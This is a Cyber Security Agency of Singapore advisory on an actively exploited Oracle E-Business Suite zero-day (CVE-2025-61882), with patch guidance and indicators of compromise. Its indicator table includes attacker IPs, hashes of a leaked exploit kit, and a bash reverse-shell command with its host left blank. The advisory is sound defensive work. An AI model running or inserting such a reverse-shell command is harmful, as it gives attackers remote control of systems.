Skip to main content

Government officials will never ask you to transfer money or disclose bank log-in details over a phone call.

Call the 24/7 ScamShield Helpline at 1799 if you are unsure if something is a scam.

Cyber Security Agency of Singapore
  1. Home
  2. Alerts & Advisories
  3. Alerts
  4. Active Exploitation of Zero-Day Vulnerability in Oracle E-Business Suite
Alerts

Active Exploitation of Zero-Day Vulnerability in Oracle E-Business Suite

6 October 2025

Oracle has released security updates to address a critical vulnerability (CVE-2025-61882) in the Oracle E‑Business Suite. Users and administrators of affected products are advised to update to the latest versions immediately.

Background

Oracle has released security updates to address a critical vulnerability (CVE‑2025‑61882) in the Concurrent Processing component (BI Publisher Integration) of the Oracle E‑Business Suite. The vulnerability has a Common Vulnerability Scoring System (CVSSv3.1) score of 9.8 out of 10.

Impact

Successful exploitation of the vulnerability could allow an unauthenticated attacker to perform remote code execution.

Known Exploitation

The vulnerability is reportedly being exploited in Clop ransomware / data theft attacks. The proof-of-concept exploit is also publicly available.

Affected Products

The vulnerability affects Oracle E‑Business Suite versions 12.2.3 through 12.2.14.

Mitigation

Users and administrators of affected product versions are strongly advised to deploy the patch for their specific EBS version and ensure the October 2023 Critical Patch Update is installed before applying the patch. 

Indicators of Compromise

Below are the indicators of compromise to support immediate detection, hunting, and containment.

Indicator

Type

Description

200[.]107[.]207[.]26

IP

Potential GET and POST activity

185[.]181[.]60[.]11

IP

Potential GET and POST activity

sh -c /bin/bash -i >& /dev/tcp// 0>&1

Command

Establish an outbound TCP connection over a specific port

76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d

SHA 256

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip

aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121

SHA 256

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py

6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b

SHA 256

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

References

https://www.oracle.com/security-alerts/alert-cve-2025-61882.html

https://nvd.nist.gov/vuln/detail/CVE-2025-61882

https://www.bleepingcomputer.com/news/security/oracle-patches-ebs-zero-day-exploited-in-clop-data-theft-attacks

https://thehackernews.com/2025/10/oracle-rushes-patch-for-cve-2025-61882.html


Back to top